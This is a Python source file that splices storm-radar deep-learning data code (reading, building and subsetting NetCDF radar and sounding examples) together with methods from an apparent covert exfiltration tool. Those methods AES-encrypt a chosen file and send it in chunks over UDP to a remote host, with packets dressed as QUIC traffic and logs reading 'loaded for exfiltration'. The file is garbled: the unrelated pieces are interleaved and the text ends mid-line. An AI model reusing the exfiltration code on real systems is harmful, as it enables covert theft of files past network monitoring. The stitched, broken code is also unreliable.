                this_radar_image_dict = storm_images.read_storm_images(
                    netcdf_file_name=radar_file_name_matrix[j, k],
                    full_id_strings_to_keep=full_id_strings,
                    valid_times_to_keep_unix_sec=storm_times_unix_sec)

            tuple_of_3d_image_matrices += (
                this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
            )

        tuple_of_4d_image_matrices += (
            dl_utils.stack_radar_fields(tuple_of_3d_image_matrices),
        )

    radar_field_names = [
        storm_images.image_file_name_to_field(f)
        for f in radar_file_name_matrix[:, 0]
    ]
    radar_heights_m_agl = numpy.array([
        storm_images.image_file_name_to_height(f)
        for f in radar_file_name_matrix[0, :]
    ], dtype=int)

    example_dict = {
        FULL_IDS_KEY: full_id_strings,
        STORM_TIMES_KEY: storm_times_unix_sec,
        RADAR_FIELDS_KEY: radar_field_names,
        RADAR_HEIGHTS_KEY: radar_heights_m_agl,
        ROTATED_GRIDS_KEY:
            this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
        ROTATED_GRID_SPACING_KEY:
            this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
        RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights(
            tuple_of_4d_image_matrices),
        TARGET_MATRIX_KEY: target_matrix
    }

    if sounding_file_name is not None:
        example_dict.update({
            SOUNDING_FIELDS_KEY: sounding_field_names,
            SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
            SOUNDING_MATRIX_KEY: sounding_matrix
        })

    return example_dict

def encrypt(self, raw):
    raw = self._pad(raw)
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(self.key, AES.MODE_CBC, iv)
    return iv + cipher.encrypt(raw)

def _create_2d3d_examples_myrorss(
        azimuthal_shear_file_names, reflectivity_file_names,
        full_id_strings, storm_times_unix_sec, target_matrix,
        sounding_file_name=None, sounding_field_names=None):
    """Creates hybrid 2D-3D examples for one file time.

    Fields in 2-D images: low-level and mid-level azimuthal shear
    Field in 3-D images: reflectivity

    :param azimuthal_shear_file_names: length-2 list of paths to storm-centered
        azimuthal-shear images.  The first (second) file should be low-level
        (mid-level) azimuthal shear.  Files will be read by
        `storm_images.read_storm_images`.
    :param reflectivity_file_names: length-H list of paths to storm-centered
        reflectivity images, where H = number of reflectivity heights.  Files
        will be read by `storm_images.read_storm_images`.
    :param full_id_strings: See doc for `_create_2d_examples`.
    :param storm_times_unix_sec: Same.
    :param target_matrix: Same.
    :param sounding_file_name: Same.
    :param sounding_field_names: Same.
    :return: example_dict: Same.
    """

    orig_full_id_strings = copy.deepcopy(full_id_strings)
    orig_storm_times_unix_sec = storm_times_unix_sec + 0

    print('Reading data from: "{0:s}"...'.format(reflectivity_file_names[0]))
    this_radar_image_dict = storm_images.read_storm_images(
        netcdf_file_name=reflectivity_file_names[0],
        full_id_strings_to_keep=full_id_strings,
        valid_times_to_keep_unix_sec=storm_times_unix_sec)

    if this_radar_image_dict is None:
        return None

    if sounding_file_name is None:
        sounding_matrix = None
        sounding_field_names = None
        sounding_heights_m_agl = None
    else:
        sounding_dict, this_radar_image_dict = _read_soundings(
            sounding_file_name=sounding_file_name,
            sounding_field_names=sounding_field_names,
            radar_image_dict=this_radar_image_dict)

        if this_radar_image_dict is None:
            return None
        if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
            return None

        sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
        sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
        sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]

    full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
    storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]

    these_indices = tracking_utils.find_storm_objects(
        all_id_strings=orig_full_id_strings,
        all_times_unix_sec=orig_storm_times_unix_sec,
        id_strings_to_keep=full_id_strings,
        times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)

    target_matrix = target_matrix[these_indices, :]

    azimuthal_shear_field_names = [
        storm_images.image_file_name_to_field(f)
        for f in azimuthal_shear_file_names
    ]
    reflectivity_heights_m_agl = numpy.array([
        storm_images.image_file_name_to_height(f)
        for f in reflectivity_file_names
    ], dtype=int)

    num_reflectivity_heights = len(reflectivity_file_names)
    tuple_of_image_matrices = ()

    for j in range(num_reflectivity_heights):
        if j != 0:
            print('Reading data from: "{0:s}"...'.format(
                reflectivity_file_names[j]
            ))
            this_radar_image_dict = storm_images.read_storm_images(
                netcdf_file_name=reflectivity_file_names[j],
                full_id_strings_to_keep=full_id_strings,
                valid_times_to_keep_unix_sec=storm_times_unix_sec)

        this_matrix = numpy.expand_dims(
            this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], axis=-1
        )
        tuple_of_image_matrices += (this_matrix,)

    example_dict = {
        FULL_IDS_KEY: full_id_strings,
        STORM_TIMES_KEY: storm_times_unix_sec,
        RADAR_FIELDS_KEY: azimuthal_shear_field_names,
        RADAR_HEIGHTS_KEY: reflectivity_heights_m_agl,
        ROTATED_GRIDS_KEY:
            this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
        ROTATED_GRID_SPACING_KEY:
            this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
        REFL_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights(
            tuple_of_image_matrices),
        TARGET_MATRIX_KEY: target_matrix
    }

    if sounding_file_name is not None:
        example_dict.update({
            SOUNDING_FIELDS_KEY: sounding_field_names,
            SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
            SOUNDING_MATRIX_KEY: sounding_matrix
        })

    num_az_shear_fields = len(azimuthal_shear_file_names)
    tuple_of_image_matrices = ()

    for j in range(num_az_shear_fields):
        print('Reading data from: "{0:s}"...'.format(
            azimuthal_shear_file_names[j]
        ))
        this_radar_image_dict = storm_images.read_storm_images(
            netcdf_file_name=azimuthal_shear_file_names[j],
            full_id_strings_to_keep=full_id_strings,
            valid_times_to_keep_unix_sec=storm_times_unix_sec)

        tuple_of_image_matrices += (
            this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
        )

    example_dict.update({
        AZ_SHEAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields(
            tuple_of_image_matrices)
    })

    return example_dict

def decrypt(self, enc):
    # enc = base64.b64decode(enc)
    iv = enc[:AES.block_size]
    cipher = AES.new(self.key, AES.MODE_CBC, iv)
    return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')

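# Hedged round-trip sketch for the AESCipher methods above (assumes the imports
# the methods already rely on: `from Crypto.Cipher import AES`, `from Crypto
# import Random`, `import hashlib`, with str plaintext as in the original):
#
#   driver = AESCipher(key="correct horse battery staple")
#   blob = driver.encrypt("hello world")  # 16-byte random IV + CBC ciphertext
#   assert driver.decrypt(blob) == "hello world"
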
def _read_metadata_from_example_file(netcdf_file_name, include_soundings):
    """Reads metadata from file with input examples.

    :param netcdf_file_name: Path to input file.
    :param include_soundings: Boolean flag.  If True and file contains
        soundings, this method will return keys "sounding_field_names" and
        "sounding_heights_m_agl".  Otherwise, will not return said keys.
    :return: example_dict: Dictionary with the following keys (explained in doc
        to `write_example_file`).
    example_dict['full_id_strings']
    example_dict['storm_times_unix_sec']
    example_dict['radar_field_names']
    example_dict['radar_heights_m_agl']
    example_dict['rotated_grids']
    example_dict['rotated_grid_spacing_metres']
    example_dict['target_names']
    example_dict['sounding_field_names']
    example_dict['sounding_heights_m_agl']

    :return: netcdf_dataset: Instance of `netCDF4.Dataset`, which can be used
        to keep reading file.
    """

    netcdf_dataset = netCDF4.Dataset(netcdf_file_name)
    include_soundings = (
        include_soundings and
        SOUNDING_FIELDS_KEY in netcdf_dataset.variables
    )

    example_dict = {
        ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)),
        TARGET_NAMES_KEY: [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[TARGET_NAMES_KEY][:])
        ],
        FULL_IDS_KEY: [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[FULL_IDS_KEY][:])
        ],
        STORM_TIMES_KEY: numpy.array(
            netcdf_dataset.variables[STORM_TIMES_KEY][:], dtype=int
        ),
        RADAR_FIELDS_KEY: [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[RADAR_FIELDS_KEY][:])
        ],
        RADAR_HEIGHTS_KEY: numpy.array(
            netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int
        )
    }

    # TODO(thunderhoser): This is a HACK to deal with bad files.
    example_dict[TARGET_NAMES_KEY] = [
        n for n in example_dict[TARGET_NAMES_KEY] if n != ''
    ]

    if example_dict[ROTATED_GRIDS_KEY]:
        example_dict[ROTATED_GRID_SPACING_KEY] = getattr(
            netcdf_dataset, ROTATED_GRID_SPACING_KEY)
    else:
        example_dict[ROTATED_GRID_SPACING_KEY] = None

    if not include_soundings:
        return example_dict, netcdf_dataset

    example_dict.update({
        SOUNDING_FIELDS_KEY: [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:])
        ],
        SOUNDING_HEIGHTS_KEY: numpy.array(
            netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:], dtype=int
        )
    })

    return example_dict, netcdf_dataset

def _pad(self, s):
    return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)

def _compare_metadata(netcdf_dataset, example_dict):
    """Compares metadata between existing NetCDF file and new batch of examples.

    Each metadata field is compared in turn, and a ValueError is raised on the
    first mismatch.

    :param netcdf_dataset: Instance of `netCDF4.Dataset`.
    :param example_dict: See doc for `write_examples_with_3d_radar`.
    :raises: ValueError: if the two sets have different metadata.
    """

    include_soundings = SOUNDING_MATRIX_KEY in example_dict

    orig_example_dict = {
        TARGET_NAMES_KEY: [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[TARGET_NAMES_KEY][:])
        ],
        ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)),
        RADAR_FIELDS_KEY: [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[RADAR_FIELDS_KEY][:])
        ],
        RADAR_HEIGHTS_KEY: numpy.array(
            netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int
        )
    }

    if example_dict[ROTATED_GRIDS_KEY]:
        orig_example_dict[ROTATED_GRID_SPACING_KEY] = int(
            getattr(netcdf_dataset, ROTATED_GRID_SPACING_KEY)
        )

    if include_soundings:
        orig_example_dict[SOUNDING_FIELDS_KEY] = [
            str(s) for s in netCDF4.chartostring(
                netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:])
        ]
        orig_example_dict[SOUNDING_HEIGHTS_KEY] = numpy.array(
            netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:], dtype=int
        )

    for this_key in orig_example_dict:
        if isinstance(example_dict[this_key], numpy.ndarray):
            if numpy.array_equal(example_dict[this_key],
                                 orig_example_dict[this_key]):
                continue
        else:
            if example_dict[this_key] == orig_example_dict[this_key]:
                continue

        error_string = (
            '\n"{0:s}" in existing NetCDF file:\n{1:s}\n\n"{0:s}" in new batch '
            'of examples:\n{2:s}\n\n'
        ).format(
            this_key, str(orig_example_dict[this_key]),
            str(example_dict[this_key])
        )

        raise ValueError(error_string)

def _unpad(s):
    return s[:-ord(s[len(s) - 1:])]

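# Runnable demonstration of the PKCS#7-style _pad/_unpad pair above, written out
# without the class (block size 32 matches self.bs from __init__):
if __name__ == "__main__":
    bs = 32
    padded = "hello" + (bs - len("hello") % bs) * chr(bs - len("hello") % bs)
    assert len(padded) == 32 and padded[-1] == chr(27)  # 27 bytes of padding
    assert padded[:-ord(padded[len(padded) - 1:])] == "hello"
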
def _filter_examples_by_class(target_values, downsampling_dict, test_mode=False):
    """Filters examples by target value.

    E = number of examples

    :param target_values: length-E numpy array of target values (integer class
        labels).
    :param downsampling_dict: Dictionary, where each key is the integer ID for
        a target class (-2 for "dead storm") and the corresponding value is the
        number of examples desired from said class.  If
        `downsampling_dict is None`, `example_dict` will be returned without
        modification.
    :param test_mode: Never mind.  Just leave this alone.
    :return: indices_to_keep: 1-D numpy array with indices of examples to keep.
        These are all integers in [0, E - 1].
    """

    num_examples = len(target_values)
    if downsampling_dict is None:
        return numpy.linspace(0, num_examples - 1, num=num_examples, dtype=int)

    indices_to_keep = numpy.array([], dtype=int)
    class_keys = list(downsampling_dict.keys())

    for this_class in class_keys:
        this_num_storm_objects = downsampling_dict[this_class]
        these_indices = numpy.where(target_values == this_class)[0]

        this_num_storm_objects = min(
            [this_num_storm_objects, len(these_indices)]
        )
        if this_num_storm_objects == 0:
            continue

        if test_mode:
            these_indices = these_indices[:this_num_storm_objects]
        else:
            these_indices = numpy.random.choice(
                these_indices, size=this_num_storm_objects, replace=False)

        indices_to_keep = numpy.concatenate((indices_to_keep, these_indices))

    return indices_to_keep

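# Runnable worked example for _filter_examples_by_class() above, using the
# deterministic test_mode path (no random sampling involved):
import numpy  # the function above also relies on this import

if __name__ == "__main__":
    labels = numpy.array([0, 0, 0, 1, 1, 0])
    keep = _filter_examples_by_class(
        target_values=labels, downsampling_dict={0: 2, 1: 2}, test_mode=True)
    # First two class-0 examples (indices 0, 1) plus both class-1 examples.
    assert sorted(keep.tolist()) == [0, 1, 3, 4]
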
def __init__(self, host, key, port=443, max_size=4096):
    # Params for the whole class
    self.host = host
    self.port = port
    self.max_size = max_size - 60
    self.AESDriver = AESCipher(key=key)
    self.serv_addr = (host, port)

    # Class globals
    self.max_packets = 255  # Limitation by QUIC itself.
    # The QUIC sequence is used to know that this is the same sequence; it's a
    # 20-byte value that is kept the same throughout the session and is
    # transferred hex encoded.
    self._genSeq()
    self.delay = 0.1
    self.sock = None
    if self._createSocket() == 1:  # Creating a UDP socket object
        sys.exit(1)
    self.serv_addr = (self.host, self.port)  # Creating socket addr format

def _file_name_to_batch_number(example_file_name):
    """Parses batch number from file.

    :param example_file_name: See doc for `find_example_file`.
    :return: batch_number: Integer.
    :raises: ValueError: if batch number cannot be parsed from file name.
    """
    pathless_file_name = os.path.split(example_file_name)[-1]
    extensionless_file_name = os.path.splitext(pathless_file_name)[0]
    return int(extensionless_file_name.split('input_examples_batch')[-1])

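# Runnable example for _file_name_to_batch_number() above (the path is
# illustrative, not from the source):
import os  # the function above also relies on this import

if __name__ == "__main__":
    assert _file_name_to_batch_number(
        '/data/examples/input_examples_batch0000017.nc') == 17
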
def _genSeq(self):
    self.raw_sequence = random.getrandbits(64)
    parts = []
    while self.raw_sequence:
        # `limit` is assumed to be a module-level 32-bit mask (0xFFFFFFFF),
        # matching the '<' + 'L' * n pack format below.
        parts.append(self.raw_sequence & limit)
        self.raw_sequence >>= 32
    self.sequence = struct.pack('<' + 'L' * len(parts), *parts)
    # struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4')
    return 0

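# Standalone sketch of the pack logic inside _genSeq() above; `limit` is assumed
# to be a module-level 32-bit mask, which the 'L' format requires:
import struct

if __name__ == "__main__":
    limit = 0xFFFFFFFF  # assumed value of the module-level `limit`
    value, parts = 0xF4102211B11C6CB1, []
    while value:
        parts.append(value & limit)
        value >>= 32
    packed = struct.pack('<' + 'L' * len(parts), *parts)
    assert len(packed) == 8  # a 64-bit sequence packs to two little-endian longs
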
def _check_target_vars(target_names):
    """Error-checks list of target variables.

    Target variables must all have the same mean lead time (average of min and
    max lead times) and event type (tornado or wind).

    :param target_names: 1-D list with names of target variables.  Each must be
        accepted by `target_val_utils.target_name_to_params`.
    :return: mean_lead_time_seconds: Mean lead time (shared by all target
        variables).
    :return: event_type_string: Event type.
    :raises: ValueError: if target variables do not all have the same mean lead
        time or event type.
    """

    error_checking.assert_is_string_list(target_names)
    error_checking.assert_is_numpy_array(
        numpy.array(target_names), num_dimensions=1
    )

    num_target_vars = len(target_names)
    mean_lead_times = numpy.full(num_target_vars, -1, dtype=int)
    event_type_strings = numpy.full(num_target_vars, '', dtype=object)

    for k in range(num_target_vars):
        this_param_dict = target_val_utils.target_name_to_params(
            target_names[k]
        )

        event_type_strings[k] = this_param_dict[target_val_utils.EVENT_TYPE_KEY]

        mean_lead_times[k] = int(numpy.round(
            (this_param_dict[target_val_utils.MAX_LEAD_TIME_KEY] +
             this_param_dict[target_val_utils.MIN_LEAD_TIME_KEY])
            / 2
        ))

    if len(numpy.unique(mean_lead_times)) != 1:
        error_string = (
            'Target variables (listed below) have different mean lead times.'
            '\n{0:s}'
        ).format(str(target_names))

        raise ValueError(error_string)

    if len(numpy.unique(event_type_strings)) != 1:
        error_string = (
            'Target variables (listed below) have different event types.'
            '\n{0:s}'
        ).format(str(target_names))

        raise ValueError(error_string)

    return mean_lead_times[0], event_type_strings[0]

def _createSocket(self):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock = sock
        return 0
    except socket.error as e:
        sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e)
        return 1

def _check_layer_operation(example_dict, operation_dict):
    """Error-checks layer operation.

    Such operations are used for dimensionality reduction (to convert radar
    data from 3-D to 2-D).

    :param example_dict: See doc for `reduce_examples_3d_to_2d`.
    :param operation_dict: Dictionary with the following keys.
    operation_dict["radar_field_name"]: Field to which operation will be
        applied.
    operation_dict["operation_name"]: Name of operation (must be in list
        `VALID_LAYER_OPERATION_NAMES`).
    operation_dict["min_height_m_agl"]: Minimum height of layer over which
        operation will be applied.
    operation_dict["max_height_m_agl"]: Max height of layer over which
        operation will be applied.

    :raises: ValueError: if something is wrong with the operation params.
    """

    if operation_dict[RADAR_FIELD_KEY] in AZIMUTHAL_SHEAR_FIELD_NAMES:
        error_string = (
            'Layer operations cannot be applied to azimuthal-shear fields '
            '(such as "{0:s}").'
        ).format(operation_dict[RADAR_FIELD_KEY])

        raise ValueError(error_string)

    if (operation_dict[RADAR_FIELD_KEY] == radar_utils.REFL_NAME
            and REFL_IMAGE_MATRIX_KEY in example_dict):
        pass
    else:
        if (operation_dict[RADAR_FIELD_KEY]
                not in example_dict[RADAR_FIELDS_KEY]):
            error_string = (
                '\n{0:s}\nExamples contain only radar fields listed above, '
                'which do not include "{1:s}".'
            ).format(
                str(example_dict[RADAR_FIELDS_KEY]),
                operation_dict[RADAR_FIELD_KEY]
            )

            raise ValueError(error_string)

    if operation_dict[OPERATION_NAME_KEY] not in VALID_LAYER_OPERATION_NAMES:
        error_string = (
            '\n{0:s}\nValid operations (listed above) do not include "{1:s}".'
        ).format(
            str(VALID_LAYER_OPERATION_NAMES),
            operation_dict[OPERATION_NAME_KEY]
        )

        raise ValueError(error_string)

    min_height_m_agl = operation_dict[MIN_HEIGHT_KEY]
    max_height_m_agl = operation_dict[MAX_HEIGHT_KEY]

    error_checking.assert_is_geq(
        min_height_m_agl, numpy.min(example_dict[RADAR_HEIGHTS_KEY])
    )
    error_checking.assert_is_leq(
        max_height_m_agl, numpy.max(example_dict[RADAR_HEIGHTS_KEY])
    )
    error_checking.assert_is_greater(max_height_m_agl, min_height_m_agl)

def _getQUICHeader(self, count):
    # `count` is an int packet counter in [0, 255]; chr() turns it into the
    # single packet-count byte.
    try:
        count_id = chr(count)
    except (TypeError, ValueError):
        sys.stderr.write("Count must be int or hex.\n")
        return 1

    if count > self.max_packets:
        sys.stderr.write("[-]\tCount must be maximum of 255.\n")
        return 1

    header = "\x0c"          # Public Flags
    header += self.sequence  # Adding CID
    header += count_id       # Packet Count
    return header

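# Datagram layout implied by _getQUICHeader() and sendFile() below -- an
# illustration inferred from the code, not a spec quoted by the source:
#
#   [ public flags "\x0c" ][ self.sequence (connection ID) ][ chr(count) ]
#   followed by one AES-CBC-encrypted chunk of the file
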
def _apply_layer_operation(example_dict, operation_dict):
    """Applies layer operation to radar data.

    :param example_dict: See doc for `reduce_examples_3d_to_2d`.
    :param operation_dict: See doc for `_check_layer_operation`.
    :return: new_radar_matrix: E-by-M-by-N numpy array resulting from layer
        operation.
    :return: operation_dict: Same as input, but with the min/max heights
        snapped to the closest available radar heights.
    """

    _check_layer_operation(example_dict=example_dict,
                           operation_dict=operation_dict)

    height_diffs_metres = (
        example_dict[RADAR_HEIGHTS_KEY] - operation_dict[MIN_HEIGHT_KEY]
    ).astype(float)
    height_diffs_metres[height_diffs_metres > 0] = -numpy.inf
    min_height_index = numpy.argmax(height_diffs_metres)

    height_diffs_metres = (
        operation_dict[MAX_HEIGHT_KEY] - example_dict[RADAR_HEIGHTS_KEY]
    ).astype(float)
    height_diffs_metres[height_diffs_metres > 0] = -numpy.inf
    max_height_index = numpy.argmax(height_diffs_metres)

    operation_dict[MIN_HEIGHT_KEY] = example_dict[
        RADAR_HEIGHTS_KEY][min_height_index]
    operation_dict[MAX_HEIGHT_KEY] = example_dict[
        RADAR_HEIGHTS_KEY][max_height_index]

    operation_name = operation_dict[OPERATION_NAME_KEY]
    operation_function = OPERATION_NAME_TO_FUNCTION_DICT[operation_name]

    if REFL_IMAGE_MATRIX_KEY in example_dict:
        orig_matrix = example_dict[REFL_IMAGE_MATRIX_KEY][
            ..., min_height_index:(max_height_index + 1), 0]
    else:
        field_index = example_dict[RADAR_FIELDS_KEY].index(
            operation_dict[RADAR_FIELD_KEY])

        orig_matrix = example_dict[RADAR_IMAGE_MATRIX_KEY][
            ..., min_height_index:(max_height_index + 1), field_index]

    return operation_function(orig_matrix, axis=-1), operation_dict

def _getFileContent(self, file_path):
    try:
        with open(file_path, 'rb') as f:
            data = f.read()
        sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path)
        return data
    except IOError as e:
        sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e))
        return 1

def _subset_radar_data(
        example_dict, netcdf_dataset_object, example_indices_to_keep,
        field_names_to_keep, heights_to_keep_m_agl, num_rows_to_keep,
        num_columns_to_keep):
    """Subsets radar data by field, height, and horizontal extent.

    If the file contains both 2-D shear images and 3-D reflectivity images
    (like MYRORSS data):

    - `field_names_to_keep` will be interpreted as a list of shear fields to
      keep.  If None, all shear fields will be kept.
    - `heights_to_keep_m_agl` will be interpreted as a list of reflectivity
      heights to keep.  If None, all reflectivity heights will be kept.

    If the file contains only 2-D images, `field_names_to_keep` and
    `heights_to_keep_m_agl` will be considered together, as a list of
    field/height pairs to keep.  If either argument is None, then all
    field-height pairs will be kept.

    If the file contains only 3-D images, `field_names_to_keep` and
    `heights_to_keep_m_agl` will be considered separately:

    - `field_names_to_keep` will be interpreted as a list of fields to keep.
      If None, all fields will be kept.
    - `heights_to_keep_m_agl` will be interpreted as a list of heights to keep.
      If None, all heights will be kept.

    :param example_dict: See output doc for `_read_metadata_from_example_file`.
    :param netcdf_dataset_object: Same.
    :param example_indices_to_keep: 1-D numpy array with indices of examples
        (storm objects) to keep.  These are examples in `netcdf_dataset_object`
        for which radar data will be added to `example_dict`.
    :param field_names_to_keep: See discussion above.
    :param heights_to_keep_m_agl: See discussion above.
    :param num_rows_to_keep: Number of grid rows to keep.  Images will be
        center-cropped (i.e., rows will be removed from the edges) to meet the
        desired number of rows.  If None, all rows will be kept.
    :param num_columns_to_keep: Same as above but for columns.
    :return: example_dict: Same as input but with the following exceptions.
    [1] Keys "radar_field_names" and "radar_heights_m_agl" may have different
        values.
    [2] If file contains both 2-D and 3-D images, dictionary now contains keys
        "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01".
    [3] If file contains only 2-D or only 3-D images, dictionary now contains
        key "radar_image_matrix".
    """

    if field_names_to_keep is None:
        field_names_to_keep = copy.deepcopy(example_dict[RADAR_FIELDS_KEY])
    if heights_to_keep_m_agl is None:
        heights_to_keep_m_agl = example_dict[RADAR_HEIGHTS_KEY] + 0

    error_checking.assert_is_numpy_array(
        numpy.array(field_names_to_keep), num_dimensions=1
    )

    heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int)
    error_checking.assert_is_numpy_array(
        heights_to_keep_m_agl, num_dimensions=1)

    if RADAR_IMAGE_MATRIX_KEY in netcdf_dataset_object.variables:
        radar_matrix = numpy.array(
            netcdf_dataset_object.variables[RADAR_IMAGE_MATRIX_KEY][
                example_indices_to_keep, ...
            ],
            dtype=float
        )

        num_radar_dimensions = len(radar_matrix.shape) - 2

        if num_radar_dimensions == 2:
            these_indices = [
                numpy.where(numpy.logical_and(
                    example_dict[RADAR_FIELDS_KEY] == f,
                    example_dict[RADAR_HEIGHTS_KEY] == h
                ))[0][0]
                for f, h in zip(field_names_to_keep, heights_to_keep_m_agl)
            ]

            these_indices = numpy.array(these_indices, dtype=int)
            radar_matrix = radar_matrix[..., these_indices]
        else:
            these_field_indices = numpy.array([
                example_dict[RADAR_FIELDS_KEY].index(f)
                for f in field_names_to_keep
            ], dtype=int)

            radar_matrix = radar_matrix[..., these_field_indices]

            these_height_indices = numpy.array([
                numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0]
                for h in heights_to_keep_m_agl
            ], dtype=int)

            radar_matrix = radar_matrix[..., these_height_indices, :]

        radar_matrix = storm_images.downsize_storm_images(
            storm_image_matrix=radar_matrix,
            radar_field_name=field_names_to_keep[0],
            num_rows_to_keep=num_rows_to_keep,
            num_columns_to_keep=num_columns_to_keep)

        example_dict[RADAR_IMAGE_MATRIX_KEY] = radar_matrix
    else:
        reflectivity_matrix_dbz = numpy.array(
            netcdf_dataset_object.variables[REFL_IMAGE_MATRIX_KEY][
                example_indices_to_keep, ...
            ],
            dtype=float
        )
        reflectivity_matrix_dbz = numpy.expand_dims(
            reflectivity_matrix_dbz, axis=-1
        )

        azimuthal_shear_matrix_s01 = numpy.array(
            netcdf_dataset_object.variables[AZ_SHEAR_IMAGE_MATRIX_KEY][
                example_indices_to_keep, ...
            ],
            dtype=float
        )

        these_height_indices = numpy.array([
            numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0]
            for h in heights_to_keep_m_agl
        ], dtype=int)

        reflectivity_matrix_dbz = reflectivity_matrix_dbz[
            ..., these_height_indices, :]

        these_field_indices = numpy.array([
            example_dict[RADAR_FIELDS_KEY].index(f)
            for f in field_names_to_keep
        ], dtype=int)

        azimuthal_shear_matrix_s01 = azimuthal_shear_matrix_s01[
            ..., these_field_indices]

        reflectivity_matrix_dbz = storm_images.downsize_storm_images(
            storm_image_matrix=reflectivity_matrix_dbz,
            radar_field_name=radar_utils.REFL_NAME,
            num_rows_to_keep=num_rows_to_keep,
            num_columns_to_keep=num_columns_to_keep)

        azimuthal_shear_matrix_s01 = storm_images.downsize_storm_images(
            storm_image_matrix=azimuthal_shear_matrix_s01,
            radar_field_name=field_names_to_keep[0],
            num_rows_to_keep=num_rows_to_keep,
            num_columns_to_keep=num_columns_to_keep)

        example_dict[REFL_IMAGE_MATRIX_KEY] = reflectivity_matrix_dbz
        example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] = azimuthal_shear_matrix_s01

    example_dict[RADAR_FIELDS_KEY] = field_names_to_keep
    example_dict[RADAR_HEIGHTS_KEY] = heights_to_keep_m_agl

    return example_dict

def sendFile(self, file_path):
    # Get file content
    data = self._getFileContent(file_path)
    if data == 1:
        return 1

    # Check that the file is not too big.
    if len(data) > (self.max_packets * self.max_size):
        sys.stderr.write("[!]\tFile is too big for export.\n")
        return 1

    # If the file is not too big, start exfiltration.
    # Exfiltrate the first packet:
    md5_sum = md5(file_path)                          # Get MD5 sum of file
    packets_count = (len(data) // self.max_size) + 1  # Total packets
    first_packet = self._getQUICHeader(count=0)       # Header for the first packet
    r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count)  # First header
    r_data = self.AESDriver.encrypt(r_data)           # Encrypt data
    self.sock.sendto(first_packet + r_data, self.serv_addr)  # Send the data
    sys.stdout.write("[+]\tSent initiation packet.\n")

    # Encrypt the chunks
    raw_dat = ""
    chunks = []
    while data:
        raw_dat += data[:self.max_size]
        enc_chunk = self.AESDriver.encrypt(data[:self.max_size])
        print(len(enc_chunk))
        chunks.append(enc_chunk)
        data = data[self.max_size:]

    i = 1
    for chunk in chunks:
        this_data = self._getQUICHeader(count=i)
        this_data += chunk
        self.sock.sendto(this_data, self.serv_addr)
        time.sleep(self.delay)
        sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count))
        i += 1

    sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (
        file_path, self.host, self.port))
    return 0

def prefix(self): return True
def _subset_sounding_data( example_dict, netcdf_dataset_object, example_indices_to_keep, field_names_to_keep, heights_to_keep_m_agl): """Subsets sounding data by field and height. :param example_dict: See doc for `_subset_radar_data`. :param netcdf_dataset_object: Same. :param example_indices_to_keep: Same. :param field_names_to_keep: 1-D list of field names to keep. If None, will keep all fields. :param heights_to_keep_m_agl: 1-D numpy array of heights to keep. If None, will keep all heights. :return: example_dict: Same as input but with the following exceptions. [1] Keys "sounding_field_names" and "sounding_heights_m_agl" may have different values. [2] Key "sounding_matrix" has been added. """ if field_names_to_keep is None: field_names_to_keep = copy.deepcopy(example_dict[SOUNDING_FIELDS_KEY]) if heights_to_keep_m_agl is None: heights_to_keep_m_agl = example_dict[SOUNDING_HEIGHTS_KEY] + 0 error_checking.assert_is_numpy_array( numpy.array(field_names_to_keep), num_dimensions=1 ) heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int) error_checking.assert_is_numpy_array( heights_to_keep_m_agl, num_dimensions=1) sounding_matrix = numpy.array( netcdf_dataset_object.variables[SOUNDING_MATRIX_KEY][ example_indices_to_keep, ... ], dtype=float ) # TODO(thunderhoser): This is a HACK. spfh_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.SPECIFIC_HUMIDITY_NAME) temp_index = example_dict[SOUNDING_FIELDS_KEY].index( 